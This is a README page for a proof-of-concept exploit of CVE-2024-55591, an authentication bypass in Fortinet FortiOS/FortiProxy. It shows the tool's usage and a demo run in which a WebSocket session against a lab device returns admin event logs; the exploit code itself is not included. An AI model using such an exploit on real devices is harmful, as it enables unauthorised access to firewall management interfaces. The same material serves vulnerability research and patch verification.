Exploit for Authentication Bypass Using an Alternate Path or Channel in Fortinet Fortiproxy
Description

CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerability PoC

Description

Using this PoC, you can bypass authentication and view the system log.

Usage

```
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 poc.py
usage: poc.py [-h] --target TARGET [--port PORT]
poc.py: error: the following arguments are required: --target/-t
```

Demo

PoC output:

```
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 poc.py -t 192.168.182.188 -p 443
WebSocket handshake successful!
{'fin': 1, 'rsv': (0, 0, 0), 'opcode': 1, 'mask': 0, 'payload_length': 22, 'payload_data': b'{"type":"initialized"}'}
{'fin': 1, 'rsv': (0, 0, 0), 'opcode': 1, 'mask': 0, 'payload_length': 578, 'payload_data': b'{"type":"eventLog","payload":{"id":32002,"name":"LOG_ID_ADMIN_LOGIN_FAIL","vdom":"root","log":{"date":"2025-01-21","time":"04:25:33","eventtime":"1737462333650070902","tz":"-0800","logid":"0100032002","type":"event","subtype":"system","level":"alert","vd":"root","logdesc":"Admin login failed","sn":"0","user":"asdasd","ui":"https(192.168.182.135)","method":"https","srcip":"192.168.182.135","dstip":"192.168.182.188","action":"login","status":"failed","reason":"name_invalid","msg":"Administrator asdasd login failed from https(192.168.182.135) because of invalid user name"}}}'}
{'fin': 1, 'rsv': (0, 0, 0), 'opcode': 1, 'mask': 0, 'payload_length': 360, 'payload_data':…
```
